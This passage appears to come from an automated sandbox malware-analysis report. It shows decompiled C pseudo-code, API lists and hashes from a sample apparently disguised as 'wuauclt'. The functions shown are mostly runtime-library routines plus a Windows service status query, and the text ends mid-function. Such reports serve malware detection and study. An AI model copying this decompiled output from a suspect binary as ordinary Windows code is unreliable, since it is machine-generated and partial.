                                                0x00000000
                                                0x00000000
                                                0x002629a3
                                                0x002629a4
                                                0x002629a5
                                                0x002629a8
                                                0x002629e4
                                                0x002629e7
                                                0x002629aa
                                                0x002629aa
                                                0x002629ab
                                                0x002629ab
                                                0x002629b8
                                                0x002629ba
                                                0x002629bc
                                                0x002629ed
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x002629bc
                                                0x00262936
                                                0x00262939
                                                0x0026293b
                                                0x0026293d
                                                0x0026293f
                                                0x00262942
                                                0x00262947
                                                0x00262962
                                                0x00262964
                                                0x0026296e
                                                0x00262970
                                                0x00262971
                                                0x00262973
                                                0x00000000
                                                0x00000000
                                                0x00262975
                                                0x0026297b
                                                0x0026297b
                                                0x00000000
                                                0x0026297b
                                                0x00262949
                                                0x0026294b
                                                0x0026294f
                                                0x00262954
                                                0x00262956
                                                0x00262958
                                                0x00000000
                                                0x00000000
                                                0x0026295a
                                                0x00000000
                                                0x0026295a
                                                0x002628f0
                                                0x002628f5
                                                0x00000000
                                                0x00000000
                                                0x002628fb
                                                0x002628fd
                                                0x00000000
                                                0x00000000
                                                0x00262914
                                                0x00262919
                                                0x0026291d
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00262923
                                                0x00262856
                                                0x00262858
                                                0x0026285a
                                                0x00262862
                                                0x00262881
                                                0x00262883
                                                0x0026288d
                                                0x0026288f
                                                0x00262890
                                                0x00262892
                                                0x00000000
                                                0x00000000
                                                0x00262898
                                                0x0026289e
                                                0x0026289e
                                                0x00000000
                                                0x0026289e
                                                0x00262866
                                                0x0026286a
                                                0x0026286f
                                                0x00262873
                                                0x00000000
                                                0x00000000
                                                0x00262879
                                                0x00000000
                                                0x00262879

                                                APIs
                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0025B361,0025B361,?,?,?,00262A29,00000001,00000001,93E85006), ref: 00262832
                                                • __alloca_probe_16.LIBCMT ref: 0026286A
                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00262A29,00000001,00000001,93E85006,?,?,?), ref: 002628B8
                                                • __alloca_probe_16.LIBCMT ref: 0026294F
                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,93E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 002629B2
                                                • __freea.LIBCMT ref: 002629BF
                                                  • Part of subcall function 0025D32E: HeapAlloc.KERNEL32(00000000,?,00000000,?,00260DDA,00000000,?,0025BC44,?,00000008,?,0025E0BD,?,?,?), ref: 0025D360
                                                • __freea.LIBCMT ref: 002629C8
                                                • __freea.LIBCMT ref: 002629ED
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocHeap
                                                • String ID:
                                                • API String ID: 2597970681-0
                                                • Opcode ID: 5954acddb30467f9323d9a6ea696c144929fb8db501dfe310b27d118e2920cdf
                                                • Instruction ID: 35d8d571c2ef2f20fd232d8cd365b3b0e05ed05380d17d079ef4efef7c0fd702
                                                • Opcode Fuzzy Hash: 5954acddb30467f9323d9a6ea696c144929fb8db501dfe310b27d118e2920cdf
                                                • Instruction Fuzzy Hash: 2651C072A21617EBDB258F64CC45EBF77A9EB84750F244669FC04E6140DB34DCE8CAA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00261F18 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 73%
                                                			E00261F18(void* __ebx, void* __edi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				void* __esi;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t94;
				long _t97;
				void _t105;
				void* _t112;
				signed int _t116;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				intOrPtr _t129;
				signed int _t131;
				signed char* _t133;
				intOrPtr* _t134;
				signed int _t135;
				void* _t136;

				_t78 =  *0x271004; // 0x80aab37c
				_v8 = _t78 ^ _t135;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t116 = (_t80 & 0x0000003f) * 0x30;
				_t133 = _a12;
				_v52 = _t133;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x273b90 + _t118 * 4)) + _t116 + 0x18));
				_v40 = _a16 + _t133;
				_t86 = GetConsoleCP();
				_t134 = _a4;
				_v60 = _t86;
				 *_t134 = 0;
				 *((intOrPtr*)(_t134 + 4)) = 0;
				 *((intOrPtr*)(_t134 + 8)) = 0;
				while(_t133 < _v40) {
					_v28 = 0;
					_v31 =  *_t133;
					_t129 =  *((intOrPtr*)(0x273b90 + _v48 * 4));
					_t123 =  *(_t129 + _t116 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						if(( *(E0025F55F(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t133);
							goto L8;
						} else {
							if(_t133 >= _v40) {
								_t131 = _v48;
								 *((char*)( *((intOrPtr*)(0x273b90 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
								 *( *((intOrPtr*)(0x273b90 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0x273b90 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t134 + 4)) =  *((intOrPtr*)(_t134 + 4)) + 1;
							} else {
								_t112 = E0025E1BE( &_v28, _t133, 2);
								_t136 = _t136 + 0xc;
								if(_t112 != 0xffffffff) {
									_t133 =  &(_t133[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t116 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t94 = E0025E1BE();
						_t136 = _t136 + 0xc;
						if(_t94 != 0xffffffff) {
							L9:
							_t133 =  &(_t133[1]);
							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t97;
							if(_t97 != 0) {
								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
									L19:
									 *_t134 = GetLastError();
								} else {
									 *((intOrPtr*)(_t134 + 4)) =  *((intOrPtr*)(_t134 + 8)) - _v52 + _t133;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t105 = 0xd;
											_v32 = _t105;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t134 + 8)) =  *((intOrPtr*)(_t134 + 8)) + 1;
													 *((intOrPtr*)(_t134 + 4)) =  *((intOrPtr*)(_t134 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				return E00257097(_v8 ^ _t135, _t134);
			}



































                                                0x00261f20
                                                0x00261f27
                                                0x00261f2a
                                                0x00261f32
                                                0x00261f36
                                                0x00261f42
                                                0x00261f45
                                                0x00261f48
                                                0x00261f4f
                                                0x00261f57
                                                0x00261f5a
                                                0x00261f60
                                                0x00261f66
                                                0x00261f6b
                                                0x00261f6d
                                                0x00261f70
                                                0x00261f75
                                                0x00261f7f
                                                0x00261f86
                                                0x00261f89
                                                0x00261f90
                                                0x00261f97
                                                0x00261fc3
                                                0x00261fe9
                                                0x00261feb
                                                0x00000000
                                                0x00261fc5
                                                0x00261fc8
                                                0x0026208f
                                                0x0026209b
                                                0x002620a6
                                                0x002620ab
                                                0x00261fce
                                                0x00261fd5
                                                0x00261fda
                                                0x00261fe0
                                                0x00261fe6
                                                0x00000000
                                                0x00261fe6
                                                0x00261fe0
                                                0x00261fc8
                                                0x00261f99
                                                0x00261f9d
                                                0x00261fa0
                                                0x00261fa6
                                                0x00261fa8
                                                0x00261fab
                                                0x00261faf
                                                0x00261fec
                                                0x00261fef
                                                0x00261ff0
                                                0x00261ff5
                                                0x00261ffb
                                                0x00262001
                                                0x00262010
                                                0x00262016
                                                0x0026201c
                                                0x00262021
                                                0x0026203d
                                                0x002620b0
                                                0x002620b6
                                                0x0026203f
                                                0x00262047
                                                0x00262050
                                                0x00262056
                                                0x00000000
                                                0x00262058
                                                0x0026205a
                                                0x0026205d
                                                0x00262076
                                                0x00000000
                                                0x00262078
                                                0x0026207c
                                                0x0026207e
                                                0x00262081
                                                0x00000000
                                                0x00262081
                                                0x0026207c
                                                0x00262076
                                                0x00262056
                                                0x00262050
                                                0x0026203d
                                                0x00262021
                                                0x00261ffb
                                                0x00000000
                                                0x00262084
                                                0x00262084
                                                0x002620b8
                                                0x002620ca

                                                APIs
                                                • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,0026268D,?,00000000,?,00000000,00000000), ref: 00261F5A
                                                • __fassign.LIBCMT ref: 00261FD5
                                                • __fassign.LIBCMT ref: 00261FF0
                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00262016
                                                • WriteFile.KERNEL32(?,?,00000000,0026268D,00000000,?,?,?,?,?,?,?,?,?,0026268D,?), ref: 00262035
                                                • WriteFile.KERNEL32(?,?,00000001,0026268D,00000000,?,?,?,?,?,?,?,?,?,0026268D,?), ref: 0026206E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                • String ID:
                                                • API String ID: 1324828854-0
                                                • Opcode ID: 48e69239c3122e48361bab2261c8ebf62f3f76646d4c94b8dc72ce3a3f8bdfbf
                                                • Instruction ID: 4f8f41585790d8c0e12b1e6859c17262f3d0e7f759472e3719ccff203e93dd9b
                                                • Opcode Fuzzy Hash: 48e69239c3122e48361bab2261c8ebf62f3f76646d4c94b8dc72ce3a3f8bdfbf
                                                • Instruction Fuzzy Hash: FB51E670A1024ADFCF10CFA8D845BEEBBF8EF19301F14411AE955E7291E771AA94CB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00260C52 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00260C52(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E00260C16(_t45, 7);
					E00260C16(_t45 + 0x1c, 7);
					E00260C16(_t45 + 0x38, 0xc);
					E00260C16(_t45 + 0x68, 0xc);
					E00260C16(_t45 + 0x98, 2);
					E0025D2F4( *((intOrPtr*)(_t45 + 0xa0)));
					E0025D2F4( *((intOrPtr*)(_t45 + 0xa4)));
					E0025D2F4( *((intOrPtr*)(_t45 + 0xa8)));
					E00260C16(_t45 + 0xb4, 7);
					E00260C16(_t45 + 0xd0, 7);
					E00260C16(_t45 + 0xec, 0xc);
					E00260C16(_t45 + 0x11c, 0xc);
					E00260C16(_t45 + 0x14c, 2);
					E0025D2F4( *((intOrPtr*)(_t45 + 0x154)));
					E0025D2F4( *((intOrPtr*)(_t45 + 0x158)));
					E0025D2F4( *((intOrPtr*)(_t45 + 0x15c)));
					return E0025D2F4( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}




                                                0x00260c58
                                                0x00260c5d
                                                0x00260c66
                                                0x00260c71
                                                0x00260c7c
                                                0x00260c87
                                                0x00260c95
                                                0x00260ca0
                                                0x00260cab
                                                0x00260cb6
                                                0x00260cc4
                                                0x00260cd2
                                                0x00260ce3
                                                0x00260cf1
                                                0x00260cff
                                                0x00260d0a
                                                0x00260d15
                                                0x00260d20
                                                0x00000000
                                                0x00260d30
                                                0x00260d35

                                                APIs
                                                  • Part of subcall function 00260C16: _free.LIBCMT ref: 00260C3F
                                                • _free.LIBCMT ref: 00260CA0
                                                  • Part of subcall function 0025D2F4: HeapFree.KERNEL32(00000000,00000000,?,00260C44,?,00000000,?,00000000,?,00260C6B,?,00000007,?,?,00261088,?), ref: 0025D30A
                                                  • Part of subcall function 0025D2F4: GetLastError.KERNEL32(?,?,00260C44,?,00000000,?,00000000,?,00260C6B,?,00000007,?,?,00261088,?,?), ref: 0025D31C
                                                • _free.LIBCMT ref: 00260CAB
                                                • _free.LIBCMT ref: 00260CB6
                                                • _free.LIBCMT ref: 00260D0A
                                                • _free.LIBCMT ref: 00260D15
                                                • _free.LIBCMT ref: 00260D20
                                                • _free.LIBCMT ref: 00260D2B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: 5eb01aa081a1f9e1795e076d4a6d6ea7148062038bb8dfa32c9dcc9acbfe695a
                                                • Instruction ID: ca03b7bb0970ec6f34221b3943dd5cb5acba9866e23d66b5592abe268b898871
                                                • Opcode Fuzzy Hash: 5eb01aa081a1f9e1795e076d4a6d6ea7148062038bb8dfa32c9dcc9acbfe695a
                                                • Instruction Fuzzy Hash: F91154B1550B09AAE530BBB0CC47FCB779D5F10700F400E16B699A6053DB75F9A55E50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0025E9EA Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 53COMMONLIBRARYCODE
                                                Download Yara Rule
                                                C-Code - Quality: 81%
                                                			E0025E9EA(void* __ecx) {
				intOrPtr _t2;
				void* _t4;
				void* _t10;
				void* _t11;
				void* _t13;
				void* _t15;
				long _t16;

				_t11 = __ecx;
				_t16 = GetLastError();
				_t10 = 0;
				_t2 =  *0x272524; // 0x6
				_t19 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t15 = E0025D3BF(_t11, 1, 0x364);
					_pop(_t13);
					if(_t15 != 0) {
						_t4 = E0025D74F(_t13, __eflags,  *0x272524, _t15);
						__eflags = _t4;
						if(_t4 != 0) {
							E0025E7D8(_t13, _t15, "(%'");
							E0025D2F4(_t10);
							__eflags = _t15;
							if(_t15 != 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t15);
							goto L4;
						}
					} else {
						_push(_t10);
						L4:
						E0025D2F4();
						L8:
						SetLastError(_t16);
					}
				} else {
					_t15 = E0025D6F9(_t11, _t19, _t2);
					if(_t15 != 0) {
						L9:
						SetLastError(_t16);
						_t10 = _t15;
					} else {
						goto L2;
					}
				}
				return _t10;
			}










                                                0x0025e9ea
                                                0x0025e9f5
                                                0x0025e9f7
                                                0x0025e9f9
                                                0x0025e9fe
                                                0x0025ea01
                                                0x0025ea0f
                                                0x0025ea1b
                                                0x0025ea1e
                                                0x0025ea21
                                                0x0025ea33
                                                0x0025ea38
                                                0x0025ea3a
                                                0x0025ea45
                                                0x0025ea4b
                                                0x0025ea53
                                                0x0025ea55
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0025ea3c
                                                0x0025ea3c
                                                0x00000000
                                                0x0025ea3c
                                                0x0025ea23
                                                0x0025ea23
                                                0x0025ea24
                                                0x0025ea24
                                                0x0025ea57
                                                0x0025ea58
                                                0x0025ea58
                                                0x0025ea03
                                                0x0025ea09
                                                0x0025ea0d
                                                0x0025ea60
                                                0x0025ea61
                                                0x0025ea67
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0025ea0d
                                                0x0025ea6e

                                                APIs
                                                • GetLastError.KERNEL32(?,?,?,0025D49A,0025D411,?,0025E994,00000001,00000364,?,0025A9FA,?,?,?,0025A5BB,?), ref: 0025E9EF
                                                • _free.LIBCMT ref: 0025EA24
                                                • _free.LIBCMT ref: 0025EA4B
                                                • SetLastError.KERNEL32(00000000), ref: 0025EA58
                                                • SetLastError.KERNEL32(00000000), ref: 0025EA61
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: ErrorLast$_free
                                                • String ID: (%'
                                                • API String ID: 3170660625-2229709766
                                                • Opcode ID: 6cbbc7a43f39d8e892bae1498c43b3746e3718839f2ff3ec30911fa011b27647
                                                • Instruction ID: bda52bbbaf0dd6b6833f4c6354c4e49aa1efcc23235cf88ffc5fbeafd783f87d
                                                • Opcode Fuzzy Hash: 6cbbc7a43f39d8e892bae1498c43b3746e3718839f2ff3ec30911fa011b27647
                                                • Instruction Fuzzy Hash: 2E012876130611679A2AB7347C49A5F225DEBC5373B320015FC19D2141DF70CE7D451C
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00259860 Relevance: 10.5, APIs: 7, Instructions: 48COMMONLIBRARYCODE
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00259860(void* __ecx) {
				void* _t5;
				void* _t6;
				void* _t9;
				void* _t15;
				long _t16;
				void* _t17;
				void* _t20;
				void* _t21;

				if( *0x272450 != 0xffffffff) {
					_t16 = GetLastError();
					_t20 = E00259FEB(__eflags,  *0x272450);
					_t9 = _t15;
					__eflags = _t20;
					if(_t20 == 0) {
						_t21 = E0025D3BF(_t9, 1, 0x28);
						__eflags = _t21;
						if(__eflags == 0) {
							L6:
							SetLastError(_t16);
							_t17 = 0;
						} else {
							_t6 = E0025A025(__eflags,  *0x272450, _t21);
							__eflags = _t6;
							if(_t6 != 0) {
								SetLastError(_t16);
								_t17 = _t21;
								_t21 = 0;
								__eflags = 0;
							} else {
								goto L6;
							}
						}
						E0025D2F4(_t21);
						_t5 = _t17;
					} else {
						SetLastError(_t16);
						_t5 = _t20;
					}
					return _t5;
				} else {
					return 0;
				}
			}











                                                0x00259867
                                                0x0025987a
                                                0x00259881
                                                0x00259883
                                                0x00259884
                                                0x00259886
                                                0x0025989c
                                                0x002598a0
                                                0x002598a2
                                                0x002598b6
                                                0x002598b7
                                                0x002598bd
                                                0x002598a4
                                                0x002598ab
                                                0x002598b2
                                                0x002598b4
                                                0x002598c2
                                                0x002598c8
                                                0x002598ca
                                                0x002598ca
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x002598b4
                                                0x002598cd
                                                0x002598d3
                                                0x00259888
                                                0x00259889
                                                0x0025988f
                                                0x0025988f
                                                0x002598d7
                                                0x00259869
                                                0x0025986b
                                                0x0025986b

                                                APIs
                                                • GetLastError.KERNEL32(?,?,00259857,00258FE1,0026F858,00000010,002587AC,?,?,?,?,?,00000000,?), ref: 0025986E
                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0025987C
                                                • SetLastError.KERNEL32(00000000,00000000,?), ref: 00259889
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: ErrorLast$Value___vcrt_
                                                • String ID:
                                                • API String ID: 483936075-0
                                                • Opcode ID: 8740b0e7b293fd8458b279dc5ffa41c397e5fa20e9cfc27aa0cb43ebe070746e
                                                • Instruction ID: 73ebe72aea633e25f898d6b486a7ef0feed9d5e9dedad0f3f1cff6c4ecd9146c
                                                • Opcode Fuzzy Hash: 8740b0e7b293fd8458b279dc5ffa41c397e5fa20e9cfc27aa0cb43ebe070746e
                                                • Instruction Fuzzy Hash: EEF0F436525632DB96212B36BC0D56A276DEB87B337250129FC0896190DF7048DE9698
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0025D04E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 30COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 91%
                                                			E0025D04E(signed int __ecx) {
				intOrPtr _t7;

				asm("lock xadd [eax], ecx");
				if((__ecx | 0xffffffff) == 0) {
					_t7 =  *0x272b08; // 0x14c9348
					if(_t7 != 0x2728e8) {
						E0025D2F4(_t7);
						 *0x272b08 = 0x2728e8;
					}
				}
				E0025D2F4( *0x273d98);
				 *0x273d98 = 0;
				E0025D2F4( *0x273d9c);
				 *0x273d9c = 0;
				E0025D2F4( *0x273a80);
				 *0x273a80 = 0;
				E0025D2F4( *0x273a84);
				 *0x273a84 = 0;
				return 1;
			}




                                                0x0025d057
                                                0x0025d05b
                                                0x0025d05d
                                                0x0025d069
                                                0x0025d06c
                                                0x0025d072
                                                0x0025d072
                                                0x0025d069
                                                0x0025d07e
                                                0x0025d08b
                                                0x0025d091
                                                0x0025d09c
                                                0x0025d0a2
                                                0x0025d0ad
                                                0x0025d0b3
                                                0x0025d0bb
                                                0x0025d0c4

                                                APIs
                                                • _free.LIBCMT ref: 0025D06C
                                                  • Part of subcall function 0025D2F4: HeapFree.KERNEL32(00000000,00000000,?,00260C44,?,00000000,?,00000000,?,00260C6B,?,00000007,?,?,00261088,?), ref: 0025D30A
                                                  • Part of subcall function 0025D2F4: GetLastError.KERNEL32(?,?,00260C44,?,00000000,?,00000000,?,00260C6B,?,00000007,?,?,00261088,?,?), ref: 0025D31C
                                                • _free.LIBCMT ref: 0025D07E
                                                • _free.LIBCMT ref: 0025D091
                                                • _free.LIBCMT ref: 0025D0A2
                                                • _free.LIBCMT ref: 0025D0B3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID: ('
                                                • API String ID: 776569668-476483421
                                                • Opcode ID: d17c56a06f428505e57bd51d6a6614a06f886c4963dbd69c2f1bef1c441e9e69
                                                • Instruction ID: 9e0bc08d86fd0a6f9f056a8b5ad5a92b66efc4275b999cceb5ecd922ab94cb14
                                                • Opcode Fuzzy Hash: d17c56a06f428505e57bd51d6a6614a06f886c4963dbd69c2f1bef1c441e9e69
                                                • Instruction Fuzzy Hash: 4BF0D0B08201229B8732EF14BC4B4483B60F704725B05051AFC5C96675CB714EEAEFC5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00254AE0 Relevance: 9.1, APIs: 6, Instructions: 63serviceCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 76%
                                                			E00254AE0(void* __ebx, void* __ecx, void* __edi) {
				signed int _v8;
				intOrPtr _v40;
				char _v44;
				char _v48;
				void* __esi;
				signed int _t9;
				void* _t20;
				void* _t33;
				void* _t34;
				signed int _t36;

				_t9 =  *0x271004; // 0x80aab37c
				_v8 = _t9 ^ _t36;
				_t34 = __ecx;
				_t33 = OpenSCManagerA(0, 0, 4);
				if(_t33 == 0) {
					L3:
					return E00257097(_v8 ^ _t36, _t34);
				} else {
					_t34 = OpenServiceA(_t33, _t34, 4);
					if(_t34 != 0) {
						__imp__QueryServiceStatusEx(0,  &_v44, 0x24,  &_v48, __ebx);
						CloseServiceHandle(_t34);
						CloseServiceHandle(_t33);
						_t20 =  ==  ? 0 : _v40;
						return E00257097(_v8 ^ _t36, CloseServiceHandle, _t34);
					} else {
						CloseServiceHandle(_t33);
						goto L3;
					}
				}
			}













                                                0x00254ae6
                                                0x00254aed
                                                0x00254af8
                                                0x00254b00
                                                0x00254b04
                                                0x00254b1e
                                                0x00254b2e
                                                0x00254b06
                                                0x00254b10
                                                0x00254b14
                                                0x00254b3d
                                                0x00254b4f
                                                0x00254b52
                                                0x00254b5c
                                                0x00254b6e
                                                0x00254b16
                                                0x00254b17
                                                0x00000000
                                                0x00254b17
                                                0x00254b14

                                                APIs
                                                • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004), ref: 00254AFA
                                                • OpenServiceA.ADVAPI32(00000000,?,00000004), ref: 00254B0A
                                                • CloseServiceHandle.ADVAPI32(00000000,?,00000004), ref: 00254B17
                                                • QueryServiceStatusEx.ADVAPI32(00000000,00000000,?,00000024,?,?,?,00000004), ref: 00254B3D
                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,00000004), ref: 00254B4F
                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,00000004), ref: 00254B52
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: Service$CloseHandle$Open$ManagerQueryStatus
                                                • String ID:
                                                • API String ID: 742736292-0
                                                • Opcode ID: 764f43fd893e7463f4527100855dce19fabb41e6463ce11a459b3f97e019381f
                                                • Instruction ID: fe59fc58fae7ea5348eabdd44ad2ef37f3a46d218954fe8e43deaef238a604cd
                                                • Opcode Fuzzy Hash: 764f43fd893e7463f4527100855dce19fabb41e6463ce11a459b3f97e019381f
                                                • Instruction Fuzzy Hash: 9C01A132A41118ABD7109B78AC49FFE7BECDF49625F00006AFD05E7280DE71DC448A94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 002593E0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 115COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 64%
                                                			E002593E0(void* __ebx, void* __esi, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr* _v40;
				void* __edi;
				void* _t56;
				char _t58;
				signed int _t64;
				intOrPtr _t65;
				void* _t66;
				intOrPtr _t69;
				intOrPtr _t71;
				intOrPtr _t72;
				intOrPtr* _t75;
				intOrPtr _t78;
				signed int _t83;
				char _t85;
				intOrPtr* _t89;
				intOrPtr* _t90;
				intOrPtr _t94;
				void* _t101;
				void* _t103;
